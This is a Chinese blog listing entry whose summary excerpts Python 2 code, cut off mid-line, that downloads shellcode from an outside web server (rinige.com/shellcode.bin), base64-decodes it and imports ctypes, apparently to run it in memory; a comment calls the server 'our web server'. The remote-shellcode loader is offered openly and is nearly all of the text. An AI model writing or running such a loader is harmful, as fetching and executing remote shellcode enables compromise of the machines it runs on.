摘要: import urllib2 import ctypes import base64 # 从我们的web服务器上下载shellcode url = "http://rinige.com/shellcode.bin" response = urllib2.urlopen(url) # base64 解码 shellcode shellcode = base64.b64decode(respo... 阅读全文
posted @ 2019-04-11 16:49 乘于时 阅读(3308) 评论(0) 推荐(0) 编辑